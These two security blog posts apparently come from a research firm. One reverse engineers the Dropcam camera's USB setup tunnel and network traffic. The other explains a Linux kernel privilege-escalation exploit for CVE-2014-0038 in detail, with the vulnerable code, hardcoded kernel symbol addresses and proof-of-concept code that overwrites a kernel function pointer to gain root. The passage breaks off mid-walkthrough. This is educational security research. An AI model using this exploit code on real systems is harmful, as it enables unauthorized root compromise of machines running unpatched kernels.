Thursday, March 27, 2014

Reversing the Dropcam Part 1: Wireless and network communications

by Kris Brosch

The "Internet of Things" marketplace has been blowing up recently, and towards the end of last year we began seeing a lot of demand for security assessments of these types of platforms. To practice, we wanted to reverse engineer a consumer platform from scratch and look around for security vulnerabilities. What follows is the first of a three-part series on what we were able to do with the Dropcam. Through this research, we found the Dropcam has a pretty solid security model, so no 0day in this post. That being said, this type of reversing work is the most important prerequisite for finding security vulnerabilities, so we thought it would be great to share our findings and techniques with the security and reverse engineering communities. Hope you enjoy, and leave a comment if you have any further ideas to extend what we're showing here.

For those who don't know, the Dropcam is a cloud-based webcam. It connects to the internet over WiFi, and users interact with it entirely through the web interface or a mobile app. We purchased some Dropcam cameras to find out more about how they work. In this series, you'll get an idea of how the process of reversing a device like the Dropcam works, including the tools we use and how we use them. This project ultimately ends up going into hardware hacking, but as you'll see below, you can often gather a lot of information about how a device works before you open the case. Everything in this first post was done without taking the Dropcam apart, while our next posts will discuss taking it apart and some hardware hacking basics.

Getting the Dropcam connected to the WiFi

As I was opening the Dropcam box, one of the first questions I asked was: how does it set up its WiFi connection? It's supposed to connect to your WiFi and present a configuration interface through the web, but it has to learn at least your WiFi SSID first to do that. The documentation tells you to plug the USB cable into your computer and run through setup.

When you plug your Dropcam's USB cable into your computer, the camera enumerates as a USB mass storage device with a few files on it, including setup binaries for both MacOS and Windows:
$ find .
./Setup Dropcam (Macintosh).app
./Setup Dropcam (Macintosh).app/Contents
./Setup Dropcam (Macintosh).app/Contents/Resources
./Setup Dropcam (Macintosh).app/Contents/Resources/English.lproj
./Setup Dropcam (Macintosh).app/Contents/Resources/English.lproj/InfoPlist.strings
./Setup Dropcam (Macintosh).app/Contents/Resources/OSXSetup.icns
./Setup Dropcam (Macintosh).app/Contents/Info.plist
./Setup Dropcam (Macintosh).app/Contents/PkgInfo
./Setup Dropcam (Macintosh).app/Contents/MacOS
./Setup Dropcam (Macintosh).app/Contents/MacOS/Setup Dropcam (Macintosh)
./Setup Dropcam (Macintosh).app/winicon.ico
./Setup Dropcam (Macintosh).app/desktop.ini
./Setup Dropcam (Windows).exe
./._Setup Dropcam (Windows).exe

Here are a few lines from the output of lsusb on the host computer:
ID 0525:a4a5 Netchip Technology, Inc. Linux-USB File Storage Gadget
  idVendor           0x0525 Netchip Technology, Inc.
  idProduct          0xa4a5 Linux-USB File Storage Gadget
  iManufacturer           2 Linux with ambarella_udc
  iProduct                3 Dropcam Setup

When I ran the setup binary, it opened a web browser to
The 32-character string in the URL is the unique identifier of my Dropcam. As you go through the web interface to set up the Dropcam, your browser eventually gets sent a JSON blob from a Dropcam web server containing a list of network SSIDs, BSSIDs, and other details of wireless networks near the camera. This data is presented in a list so that the user can pick which access point they want their camera to connect to.

How does the server get the list of WiFi networks? It must be communicating with the Dropcam, but at first it's not clear how. When the device is plugged in to a USB port, the Dropcam appears only as a mass storage device. So somehow a mass storage device is talking to the Internet through my computer?

To investigate further, I set up the testing environment depicted here:

The executable ran in a Windows virtual machine with Process Monitor from the Sysinternals Suite inspecting its behavior, while I captured USB traffic and network traffic from the setup executable using two instances of Wireshark on my Linux host machine. The setup executable also started the Chrome browser in the Windows VM, which I configured to use Burp Suite as a proxy.

Process Monitor gave me an initial idea of what was going on:

The setup binary is first reading the .dcdata/offset file (1), then doing reads and writes directly to the "disk" (2). The .dcdata/offset file is simply a text file with a number in it:
$ cat .dcdata/offset
1312768

You can see that 1312768 is the byte-offset into the "disk" where the setup executable is reading and writing (3). Wireshark lets us see the actual data that is being transferred back and forth. Here's a screenshot of part of the USB capture:

You can see that a SCSI Write command is being made to logical block address 0xa04, with length 4 (1). 0xa04 is 2564, which multiplied by the 512-byte block size is byte 1312768. The length 4 multiplied by 512 is 2048 bytes; this write corresponds to the highlighted WriteFile command in the Process Monitor screenshot. The data being written is shown in the hexdump (2) of the URB_BULK packet (3) following the SCSI Write command packet.
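The arithmetic above is easy to check in a few lines of C. This is only a sketch of the conversion; the function names are made up for illustration, and the 512-byte block size is the one stated in the text.

```c
#include <stdint.h>

/* Block size of the emulated "disk", as stated in the text. */
#define BLOCK_SIZE 512u

/* Convert a SCSI logical block address to a byte offset on the "disk". */
uint64_t lba_to_byte_offset(uint32_t lba)
{
    return (uint64_t)lba * BLOCK_SIZE;
}

/* Convert a SCSI transfer length (in blocks) to a length in bytes. */
uint64_t blocks_to_bytes(uint32_t nblocks)
{
    return (uint64_t)nblocks * BLOCK_SIZE;
}
```

Calling lba_to_byte_offset(0xa04) gives the value stored in .dcdata/offset, and blocks_to_bytes(4) gives the size of the write seen in Process Monitor.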

What's happening is that the setup binary is communicating with the Dropcam by reading and writing network packets from and to a "magic" address on the USB mass storage "disk". By looking at multiple packets being sent over this USB channel and reading the setup binary in IDA, I was able to get an idea of the protocol.

Above is a screenshot from the IDA Pro disassembly of the Macintosh setup binary (the Mac binary had more symbols and was easier to read than the Windows binary). The screenshot shows a portion of the code involved in decoding received packets. All the packets that I captured started with the big-endian magic number 0xd409ca11, and I found this code by searching in IDA for that number. The number (1) is confirmed to be a magic number by an error message that is reached when the first 4 bytes are non-zero and don't equal 0xd409ca11 (2). In addition, bytes 6 and 7 (3) appear to be a big-endian sequence number according to another error message (4), and bytes 8 and 9 (5) turn out to be a big-endian length field. The remaining two bytes, 4 and 5, appear to increment from -1 in packets with no payload sent from the setup binary to the Dropcam; we presume that these are acknowledgment packets.
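To make the layout concrete, here is a minimal sketch of a parser for the 10-byte header as described above. The struct and function names are my own labels, not symbols from the setup binary, and the "ack" interpretation of bytes 4 and 5 is only the presumption stated in the text. Unlike the binary, this sketch rejects anything that does not start with the magic number, including all-zero data.

```c
#include <stddef.h>
#include <stdint.h>

#define DC_MAGIC      0xd409ca11u /* magic number at the start of every packet */
#define DC_HEADER_LEN 10

/* Hypothetical names; only the byte layout comes from the analysis. */
struct dc_header {
    uint32_t magic;  /* bytes 0-3 */
    uint16_t ack;    /* bytes 4-5: presumed acknowledgment counter (0xffff is -1) */
    uint16_t seq;    /* bytes 6-7: sequence number */
    uint16_t length; /* bytes 8-9: payload length */
};

static uint16_t be16(const uint8_t *p)
{
    return (uint16_t)((p[0] << 8) | p[1]);
}

static uint32_t be32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}

/* Returns 0 on success, -1 if the buffer is too short or the magic is wrong. */
int dc_parse_header(const uint8_t *buf, size_t len, struct dc_header *out)
{
    if (len < DC_HEADER_LEN)
        return -1;
    out->magic = be32(buf);
    if (out->magic != DC_MAGIC)
        return -1;
    out->ack = be16(buf + 4);
    out->seq = be16(buf + 6);
    out->length = be16(buf + 8);
    return 0;
}
```

Fed the init packet from the capture below (d4 09 ca 11 ff ff 00 00 00 05 ...), this yields ack 0xffff, sequence number 0, and a payload length of 5.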

Here are some packets, extracted from my USB Wireshark capture:

Init packet, setup -> dropcam:
d4 09 ca 11 ff ff 00 00 00 05 00 ff ff 00 00      ..............

Init response packet, dropcam -> setup:
d4 09 ca 11 00 00 00 00 01 25 00 ff ff 01 08 64   .........%.....d
30 32 34 33 37 38 31 38 32 64 61 34 66 33 37 62   024378182da4f37b
30 65 39 38 31 39 34 36 39 38 39 66 34 30 61 00   0e981946989f40a.
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00 00 8c 00 00 00 0f 02 00 01 00 13 01 bb 6e 65
78 75 73 2e 64 72 6f 70 63 61 6d 2e 63 6f 6d

Ack, setup -> dropcam
d4 09 ca 11 ff ff 00 01 00 00                     ..........

Data, dropcam -> setup
d4 09 ca 11 00 00 00 01 00 81 03 00 01 00 7c 16   ..............|.
03 01 00 77 01 00 00 73 03 01 4d e5 e3 9d c8 16   ...w...s..M.....
17 eb d7 4e 78 42 02 2e ef 7d 4b 14 d9 2b ad fe   ...NxB...}K..+..
f2 e4 84 68 49 1f 0f fc 00 ab 00 00 06 c0 13 c0   ...hI...........
14 00 ff 01 00 00 44 00 0b 00 04 03 00 01 02 00   ......D.........
0a 00 34 00 32 00 01 00 02 00 03 00 04 00 05 00   ..4.2...........
06 00 07 00 08 00 09 00 0a 00 0b 00 0c 00 0d 00   ................
0e 00 0f 00 10 00 11 00 12 00 13 00 14 00 15 00   ................
16 00 17 00 18 00 19 00 23 00 00                  ........#..    

Ack, setup -> dropcam
d4 09 ca 11 00 00 00 02 00 00                     ..........

Data, setup -> dropcam
d4 09 ca 11 00 01 00 03 06 1b 03 00 01 06 16 16   ................
03 01 06 11 02 00 00 4d 03 01 52 61 ba a6 7f 84   .......M..Ra....
26 84 98 0d ed 96 f2 07 e2 90 30 9c 6d 21 9d 4f   &.........0.m!.O
fa 80 8f 91 3f 75 ba bd 01 d6 20 52 61 ba a6 7b   ....?u.... Ra..{
f6 97 94 dc 02 28 3c 49 2c 2b c4 18 f8 8d df f3   .....(<I,+......
ac e9 de d3 06 fe bc ed 25 dd 7f c0 13 00 00 05   ........%.......
ff 01 00 01 00 0b 00 03 0b 00 03 08 00 03 05 30   ...............0
82 03 01 30 82 01 e9 02 05 00 ed f7 59 0d 30 0d   ...0........Y.0.
06 09 2a 86 48 86 f7 0d 01 01 05 05 00 30 47 31   ..*.H........0G1
0b 30 09 06 03 55 04 06 13 02 55 53 31 26 30 24   .0...U....US1&0$
06 03 55 04 03 13 1d 44 72 6f 70 63 61 6d 20 43   ..U....Dropcam C
65 72 74 69 66 69 63 61 74 65 20 41 75 74 68 6f   ertificate Autho
72 69 74 79 31 10 30 0e 06 03 55 04 0a 13 07 44   rity1.0...U....D
72 6f 70 63 61 6d 30 22 18 0f 32 30 30 31 30 31   ropcam0"..200101
30 31 30 30 30 30 30 30 5a 18 0f 32 30 35 30 30   01000000Z..20500
31 30 31 30 30 30 30 30 30 5a 30 3e 31 0b 30 09   101000000Z0>1.0.
06 03 55 04 06 13 02 55 53 31 1d 30 1b 06 03 55   ..U....US1.0...U
04 03 13 14 6f 63 75 6c 75 73 37 34 2e 64 72 6f   ....oculus74.dro
70 63 61 6d 2e 63 6f 6d 31 10 30 0e 06 03 55 04   pcam.com1.0...U.
0a 13 07 44 72 6f 70 63 61 6d 30 82 01 22 30 0d   ...Dropcam0.."0.

The setup binary starts out by sending an initialization command to the Dropcam (command 00 ff ff 00 00). The Dropcam replies with a packet containing its UUID (so the setup binary knows where to point the web browser) and a host for the setup binary to initiate a TCP connection to (the init response above ends with the bytes 01 bb, which is 443 in decimal, followed by the string nexus.dropcam.com). After that, every packet contains a 5-byte sub-header (the first byte is 0x03, the last two bytes are a length field), followed by data. This same data was captured by my other Wireshark instance, which was capturing a TLSv1 connection made from the setup binary to that host. The Dropcam requests that a TCP connection be made, and the setup binary tunnels all of that connection's traffic over the USB mass storage channel.
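The sub-header can be sketched the same way. The code below is an illustration only: the names are hypothetical, the meaning of bytes 1 and 2 was not determined in this post, and the TLS check simply looks for a handshake record (content type 0x16, major version 3) at the start of the tunneled data.

```c
#include <stddef.h>
#include <stdint.h>

#define DC_SUBHEADER_LEN 5

/* Hypothetical names; only the byte layout comes from the captures. */
struct dc_subheader {
    uint8_t  type;      /* byte 0: 0x03 on tunneled data packets */
    uint16_t field_1_2; /* bytes 1-2: meaning not determined here */
    uint16_t length;    /* bytes 3-4: big-endian length of the data that follows */
};

/* Returns 0 on success, -1 if the payload is shorter than the sub-header claims. */
int dc_parse_subheader(const uint8_t *payload, size_t len, struct dc_subheader *out)
{
    if (len < DC_SUBHEADER_LEN)
        return -1;
    out->type = payload[0];
    out->field_1_2 = (uint16_t)((payload[1] << 8) | payload[2]);
    out->length = (uint16_t)((payload[3] << 8) | payload[4]);
    if ((size_t)out->length > len - DC_SUBHEADER_LEN)
        return -1;
    return 0;
}

/* Returns 1 if the data starts like a TLS handshake record, 0 otherwise. */
int looks_like_tls_handshake(const uint8_t *data, size_t len)
{
    return len >= 5 && data[0] == 0x16 && data[1] == 0x03;
}
```

In the first data packet from the capture, the payload starts with 03 00 01 00 7c followed by 16 03 01 00 77: a sub-header announcing 0x7c bytes, then a TLS record whose own 5-byte header plus 0x77 bytes of content add up to exactly 0x7c.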

So this is how the Dropcam connects to the internet: it appears as a USB mass storage device containing a setup executable to the host computer; the setup binary then tunnels a connection from the Dropcam over the USB link by reading and writing at a particular offset into the raw "disk" and connecting out to the internet using the host computer's internet connection. Meanwhile, the user is presented with a list of WiFi networks that the cloud server obtained over the tunneled connection. The user picks their network in the web interface, and types in their WiFi password. The selected network and password are then sent in a POST request to the cloud server, which pushes the password down to the camera, again over the tunneled connection.

Considerations for WiFi password privacy

Something that users should be aware of is that this approach requires them to upload their network password to the server, and it might not be clear to a non-technical user that they are doing this. Dropcam (the company) probably isn't doing anything directly with the transmitted WiFi passwords, but there's no guarantee that an attacker who compromised the Dropcam cloud servers wouldn't. It's generally good practice to avoid sending confidential data to the cloud; the setup binary could instead communicate the WiFi information directly to the camera. We're not sure whether there is some product architecture reason for the current design that we're not aware of.

Further exploring the encrypted connections

The Dropcam makes two outgoing TLS connections over the USB tunnel. The first connection directs the camera to connect to an “oculus” server. The camera itself makes the same two TLS connections over WiFi once it is configured: a short connection followed by a long-term connection to an “oculus” server. The long-term connection is used for all of the camera's communications including streaming video, configuration changes, and firmware updates.

After understanding how the Dropcam tunnels its TLS connections out over the mass storage interface, the next step was to attempt a man-in-the-middle attack on the TLS connections in order to capture their contents. However, the TLS connections utilize both client and server side certificate verification - when making the outgoing TLS connections, the Dropcam checks the server's certificate, and the server also checks the Dropcam's client certificate. Since the TLS connection endpoint is on the camera itself (not in the setup binary), I wasn't able to inspect the contents of the TLS connection until after I'd taken the Dropcam apart, which I'll describe in our next Dropcam blog post.

Follow us on twitter @IncludeSecurity and check this blog again next week for subsequent posts in this Reverse Engineering series.

Thursday, March 6, 2014

How to exploit the x32 recvmmsg() kernel vulnerability CVE-2014-0038

On January 31st 2014 a post appeared on the oss-sec list [1] describing a bug in the Linux kernel implementation of the x32 recvmmsg syscall that could potentially lead to privilege escalation. It didn't take long until the first exploits appeared. In this blog post we'll walk through the vulnerability and Samuel's proof-of-concept exploit in detail.

The Vulnerable Linux Kernel Code

The bug is located in the x32 version of the recvmmsg syscall in the Linux kernel. The recvmmsg syscall allows for receiving multiple messages on a socket with just one syscall (and can thus increase performance in certain situations).

To be clear, the x32 ABI (not to be confused with the x86 ABI) is a separate ABI that is not enabled by default on all distributions. However, recent Ubuntu-based distributions as well as Arch Linux have enabled it. For more details on the x32 ABI refer to [2]. In short, x32 is an ABI which takes advantage of the 64-bit environment while using 32-bit pointers for less overhead. However, the x32 system calls can also be accessed by standard 64-bit applications by adding the value of __X32_SYSCALL_BIT to 64-bit system call numbers.
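As a small illustration of how such a syscall number is formed, the sketch below adds the x32 bit to a table slot. The macro and function names are mine. The value 0x40000000 is what the kernel's x86 UAPI headers define for __X32_SYSCALL_BIT; the slot number 537 for the x32 variant of recvmmsg is an assumption on my part that should be verified against the syscall table of the kernel being examined.

```c
/* Value of __X32_SYSCALL_BIT in the kernel's x86 UAPI headers. */
#define X32_SYSCALL_BIT 0x40000000L

/*
 * Assumption: 537 is the x32-specific table slot for recvmmsg.
 * Check arch/x86 syscall tables for the kernel you are looking at.
 */
#define X32_RECVMMSG_SLOT 537L

/* Build the number a 64-bit process would pass to syscall(2) to reach an x32 entry. */
long x32_syscall_number(long slot)
{
    return X32_SYSCALL_BIT + slot;
}
```

A regular 64-bit program can pass the resulting number straight to syscall(2), which is how the x32 code path becomes reachable without building an x32 binary.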

The CVE-2014-0038 bug is a fairly classic case of trusting user supplied input. The timeout pointer in the function below is passed directly from user space to __sys_recvmmsg, which expects a trusted pointer, without first copying the value of the user supplied pointer to a controlled kernel space variable.
The following is the code which handles the recvmmsg syscall for the x32 ABI (net/compat.c):

asmlinkage long compat_sys_recvmmsg(int fd, struct compat_mmsghdr __user *mmsg,
                                    unsigned int vlen, unsigned int flags,
                                    struct compat_timespec __user *timeout)
{
    int datagrams;
    struct timespec ktspec;

    if (flags & MSG_CMSG_COMPAT)
        return -EINVAL;

    if (COMPAT_USE_64BIT_TIME) /* set when doing the x32 syscall, the x32 ABI uses 64bit time values */
        return __sys_recvmmsg(fd, (struct mmsghdr __user *)mmsg, vlen,
                              flags | MSG_CMSG_COMPAT,
                              (struct timespec *) timeout);
    /* ... */

Pointers passed from user space are marked with the __user attribute to make sure they are only accessed through the user space API functions (e.g. copy_to_user, copy_from_user, ...). In this case though, the timeout parameter is cast directly to a type not containing the __user attribute, and then passed on to __sys_recvmmsg without any further checks on it.
Compare this to what the normal x86_64 syscall does:

SYSCALL_DEFINE5(recvmmsg, int, fd, struct mmsghdr __user *, mmsg,
                unsigned int, vlen, unsigned int, flags,
                struct timespec __user *, timeout)
{
    int datagrams;
    struct timespec timeout_sys;

    if (flags & MSG_CMSG_COMPAT)
        return -EINVAL;

    if (!timeout)
        return __sys_recvmmsg(fd, mmsg, vlen, flags, NULL);

    /* -1- */
    if (copy_from_user(&timeout_sys, timeout, sizeof(timeout_sys)))
        return -EFAULT;

    datagrams = __sys_recvmmsg(fd, mmsg, vlen, flags, &timeout_sys);

    if (datagrams > 0 &&
        copy_to_user(timeout, &timeout_sys, sizeof(timeout_sys)))
        datagrams = -EFAULT;

    return datagrams;
}

At -1- the timeout struct is copied into a kernel space variable before passing it to __sys_recvmmsg. That's the correct way to do it.

Digging Deeper Into the Vulnerability

First things first: the timespec structure, defined in include/uapi/linux/time.h:

struct timespec {
    long tv_sec;   /* seconds */
    long tv_nsec;  /* nanoseconds */
};

Now let's take a closer look at what happens to the timeout pointer passed from user space.
From compat_sys_recvmmsg the pointer is passed to __sys_recvmmsg, located in net/socket.c:

int __sys_recvmmsg(int fd, struct mmsghdr __user *mmsg, unsigned int vlen,
                   unsigned int flags, struct timespec *timeout)
{
    if (timeout && /* -1- */
        poll_select_set_timeout(&end_time, timeout->tv_sec,
                                timeout->tv_nsec))
        return -EINVAL;

    /* ... */

    while (datagrams < vlen) { /* -2- */
        /*
         * Basically just a loop calling recvmsg
         * until the timeout is hit or vlen messages have
         * been received.
         */
        if (MSG_CMSG_COMPAT & flags) {
            err = ___sys_recvmsg(sock, (struct msghdr __user *)compat_entry,
                                 &msg_sys, flags & ~MSG_WAITFORONE,
                                 datagrams);
            /* ... */
        } else {
            err = ___sys_recvmsg(sock, (struct msghdr __user *)entry,
                                 &msg_sys, flags & ~MSG_WAITFORONE,
                                 datagrams);
            /* ... */
        }

        /* ... */

        if (timeout) {
            ktime_get_ts(timeout); // put current time into *timeout
            // then subtract that from end_time
            *timeout = timespec_sub(end_time, *timeout); /* -3- */
            if (timeout->tv_sec < 0) {
                timeout->tv_sec = timeout->tv_nsec = 0; /* -4- */
                break;
            }

            /* Timeout, return less than vlen datagrams */
            if (timeout->tv_nsec == 0 && timeout->tv_sec == 0)
                break;
        }
        /* ... */

The first thing to note here is the block at -1-. Here poll_select_set_timeout will set end_time to the time when the timeout will be over. More importantly, it will check whether timeout points to a valid timespec struct. If it does not then it will return -EINVAL and thus cause the syscall to fail.
Here is the function performing the check (include/linux/time.h):

static inline bool timespec_valid(const struct timespec *ts)
{
    /* Dates before 1970 are bogus */
    if (ts->tv_sec < 0) /* -5- */
        return false;
    /* Can't have more nanoseconds then a second */
    if ((unsigned long)ts->tv_nsec >= NSEC_PER_SEC) /* -6- */
        // include/linux/time.h: #define NSEC_PER_SEC 1000000000L
        return false;
    return true;
}

At -5- the first long, tv_sec, is checked to be non-negative, meaning its most significant byte must be smaller than 0x80, and at -6- the tv_nsec member is checked to be smaller than 1,000,000,000 (= 1 second), so tv_nsec must be at least 0 and below 0x000000003b9aca00. Keep this in mind as we move on.
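The two checks can be tried out in user space. The following is a plain re-implementation for experimenting, not kernel code: it uses fixed 64-bit integers in place of the kernel's long, and the function name is made up.

```c
#include <stdbool.h>
#include <stdint.h>

#define NSEC_PER_SEC 1000000000LL

/*
 * User space re-implementation of the two checks in timespec_valid(),
 * taking the two 64-bit values directly instead of a struct pointer.
 */
bool ts_values_valid(int64_t tv_sec, int64_t tv_nsec)
{
    /* -5-: a set sign bit (top byte >= 0x80) makes tv_sec negative. */
    if (tv_sec < 0)
        return false;
    /* -6-: the unsigned comparison also rejects negative tv_nsec values. */
    if ((uint64_t)tv_nsec >= (uint64_t)NSEC_PER_SEC)
        return false;
    return true;
}
```

An unmodified kernel pointer such as 0xffffffff8142fec0 fails the first check when read as tv_sec, while a value such as 0xff followed by a zeroed tv_nsec passes both. This is why the position the timeout pointer is aimed at matters so much in what follows.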
Next the code enters the loop at -2-, waiting for incoming packets. After a packet has been received by ___sys_recvmsg the timeout struct is updated to contain the time left (-3-).

If that value is < 0, both tv_sec and tv_nsec are set to zero at -4- and the function returns.
The loop will thus exit if either vlen messages have been received or the timeout is hit after receiving a packet. Do note the call will only return after a packet has been received, even if the timeout has already been hit. By sending packets to ourselves from a forked child, we can enter the code that updates the timeout at any time. And by setting vlen to 1, we can guarantee that timeout is only written to once.

The Exploitation vector

So what can we do with this situation from an exploitation perspective?

The basic idea that comes to mind is pointing the timeout pointer to sensitive kernel data with known content and waiting a specific amount of time until sending a UDP packet (thus reaching the block at -3- in the code above). This will cause the function to update the timeout structure and return.

In other words we will make the kernel treat some of its own memory (preferably a function pointer) as the timeout argument and thus cause the kernel to overwrite part of its own memory. This allows us to write a nearly arbitrary value to an address of our choosing (we have 64bit pointers so we can address the whole address space), as long as the original value is known and there is a valid timespec struct at that address.

Since pointers into the kernel image (function pointers, for example) have their high 4 bytes set to 0xff on x86_64, they make a good target.
Imagine the following situation:
pointer: 0xffffffff44434241               uninitialized data
     (little endian)
| 41 42 43 44 ff ff ff ff | 00 00 00 00 00 00 00 00 | 00 00 00 00 00 00 00 00 |
                       ^ point timeout here
                       [-------- tv_sec -------] [------- tv_nsec -------]
If the address of the last (most significant) byte of the pointer is passed as a timeout, waiting >= 255 seconds will clear that byte without mangling up adjacent data as the whole block is set to zero. Repeating this for the next two bytes will allow us to point that pointer into user space (this is what the original version of the exploit did).

To speed things up the bytes can be cleared in parallel. For this to work the time between the syscall and the incoming packet must be > 254s and < 255s. This will cause the recvmmsg function to write garbage to the following two longs, as they are treated as tv_nsec value and will then contain the remaining nanoseconds of the timeout.

A Walk-through of the Proof-of-concept Exploit

Now let's start with a brief overview on the steps the exploit takes to get root privileges.
The exploit follows the common scheme of tricking the kernel into executing code in user space memory. This has quite a few advantages, including being able to write the payload in nicely readable C code. For a more detailed discussion of this technique refer to [3].

Here are the basic steps:
  • Allocate executable and writable memory at the address to which the kernel will jump, and copy the kernel payload to the end of that region.
  • Target the release function pointer of the ptmx_fops structure, located in the .data section, which is writable kernel memory. Zero out the three most significant bytes, thereby turning it into a pointer inside of the region mapped by user space.
  • Open /dev/ptmx and close it, causing ptmx_fops->release() to be called.
  • Check if root privileges were obtained and start a shell.
Let's examine each of those steps in more detail.

Resolving symbols

The exploit needs four kernel symbols to be resolved:

#define PTMX_FOPS           0xffffffff81fb30c0LL
#define TTY_RELEASE         0xffffffff8142fec0LL
#define COMMIT_CREDS        0xffffffff8108ad40LL
#define PREPARE_KERNEL_CRED 0xffffffff8108b010LL

They can be taken from /boot/ or the decompressed kernel image via nm.
The PoC linked at the end of this post also contains a script which will help with resolving the symbols. The README in the PoC provides details on how to use it.

Setting things up

/* Prepare payload... */
printf("preparing payload buffer...\n");
code = (long)mmap((void*)(TTY_RELEASE & 0x000000fffffff000LL), PAYLOADSIZE, 7, 0x32, 0, 0);
memset((void*)code, 0x90, PAYLOADSIZE);
code += PAYLOADSIZE - 1024;
memcpy((void*)code, &kernel_payload, 1024);

The first thing the exploit does is allocate executable and writable memory at a fixed address. TTY_RELEASE is the original value of the targeted pointer in kernel space. Since the three most significant bytes of that pointer will be cleared, a mask of 0x000000fffffff000 has to be applied to it.
The memory region is then filled with nops and the kernel payload (discussed later) is copied into it.
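The address arithmetic behind this step can be checked in isolation. The sketch below only does the masking; the helper names are hypothetical, and TTY_RELEASE is the example value from the symbol list above. As a side note, on Linux x86 the literal 7 passed to mmap corresponds to PROT_READ | PROT_WRITE | PROT_EXEC and 0x32 to MAP_PRIVATE | MAP_FIXED | MAP_ANONYMOUS.

```c
#include <stdint.h>

#define TTY_RELEASE 0xffffffff8142fec0ULL /* example value from the symbol list */
#define MAP_MASK    0x000000fffffff000ULL /* mask applied before calling mmap() */

/* Pointer value once its three most significant bytes have been zeroed. */
uint64_t cleared_pointer(uint64_t kptr)
{
    return kptr & 0x000000ffffffffffULL;
}

/* Page-aligned user space address at which the buffer gets mapped. */
uint64_t mapping_base(uint64_t kptr)
{
    return kptr & MAP_MASK;
}

/* Where inside the mapping the cleared pointer lands (its low 12 bits). */
uint64_t offset_in_mapping(uint64_t kptr)
{
    return cleared_pointer(kptr) - mapping_base(kptr);
}
```

With the example value, the mapping starts at 0x000000ff8142f000 and the cleared pointer lands 0xec0 bytes into it, inside the nop-filled part of the buffer as long as PAYLOADSIZE - 1024 is larger than that offset (PAYLOADSIZE is defined in the PoC and not shown in this post).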

The target

/*
 * Now clear the three most significant bytes of the fops pointer
 * to the release function.
 * This will make it point into the memory region mapped above.
 */
printf("changing kernel pointer to point into controlled buffer...\n");
target = PTMX_FOPS + FOPS_RELEASE_OFFSET;
for (i = 0; i < 3; i++) {
    pids[i] = fork();
    if (pids[i] == 0) {
        zero_out(target + (5 + i));
        exit(EXIT_SUCCESS);
    }
    sleep(1);
}

The pointer targeted in the exploit is the release function pointer of the ptmx_fops structure, which originally points to tty_release. In the Linux kernel the file_operations structure contains a bunch of function pointers to be executed when user space accesses the associated file. Examples include open, release, write, ... ptmx_fops->release is called when the last reference to that file descriptor is released. The two pointers following release are not initialized (= 0) and will thus be valid tv_nsec values. The situation is then similar to the one depicted in the diagram shown in the "Exploitation Vector" section. User space can map 0x000000ffxxxxxxxx, meaning only 3 of the 4 high order bytes of the pointer need to be cleared. To speed things up three additional processes are forked, each one clearing a byte of the pointer. (Note: The sleep(1) between each fork is done here to guarantee a different seed for srand() in each child. This is needed so every child opens a different UDP port.)

Exploiting the bug

void zero_out(long addr)
{
    int sockfd, retval, port, pid, i;
    struct sockaddr_in sa;
    char buf[BUFSIZE];
    struct mmsghdr msgs;
    struct iovec iovecs;

    srand(time(NULL));

    port = 1024 + (rand() % (0x10000 - 1024));

    sockfd = socket(AF_INET, SOCK_DGRAM, 0);
    if (sockfd == -1) {
        perror("socket()");
        exit(EXIT_FAILURE);
    }

    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    sa.sin_port = htons(port);
    if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {
        perror("bind()");
        exit(EXIT_FAILURE);
    }

    memset(&msgs, 0, sizeof(msgs));
    iovecs.iov_base = buf;
    iovecs.iov_len = BUFSIZE;
    msgs.msg_hdr.msg_iov = &iovecs;
    msgs.msg_hdr.msg_iovlen = 1;

    /*
     * start a separate process to send a UDP message after 255 seconds so the syscall returns,
     * but not before updating the timeout struct and writing the remaining time into it.
     * 0xff - 255 seconds = 0x00
     */
    printf("clearing byte at 0x%lx\n", addr);
    pid = fork();
    if (pid == 0) {
        memset(buf, 0x41, BUFSIZE);

        if ((sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) {
            perror("socket()");
            exit(EXIT_FAILURE);
        }

        sa.sin_family = AF_INET;
        sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
        sa.sin_port = htons(port);

        sleep(0xfe);

        printf("waking up parent...\n");
        /* cast added so the call matches sendto()'s prototype */
        sendto(sockfd, buf, BUFSIZE, 0, (struct sockaddr *) &sa, sizeof(sa)); /* -1- */
        exit(EXIT_SUCCESS);
    } else if (pid > 0) {
        retval = syscall(__NR_recvmmsg, sockfd, &msgs, 1, 0, (void*)addr); /* -2- */
        if (retval == -1) {
            printf("address can't be written to, not a valid timespec struct!\n");
            exit(EXIT_FAILURE);
        }
        waitpid(pid, 0, 0);
        printf("byte zeroed out\n");
    } else {
        perror("fork()");
        exit(EXIT_FAILURE);
    }
}

This is the key part of the exploit: we're abusing the bug as discussed in the "Exploitation Vector" section. After a lot of code to set up the structures needed for the syscall, the passed address is used as the timeout pointer and the vulnerable syscall is called (-2-).
At -1- the forked child process wakes its parent so that the time difference between the syscall and the incoming packet is between 254 and 255 seconds, thus setting the least significant byte of the tv_sec member to 0.
Keep in mind that this function is executed by three child processes. The memory at the address of ptmx_fops->release roughly looks like this at the beginning:

     release pointer             uninitialized            uninitialized
| c0 fe 42 81 ff ff ff ff | 00 00 00 00 00 00 00 00 | 00 00 00 00 00 00 00 00 |
                       ^ address for child 3
                    ^ address for child 2
                 ^ address for child 1
Turning it into:
     release pointer               mangled                  mangled
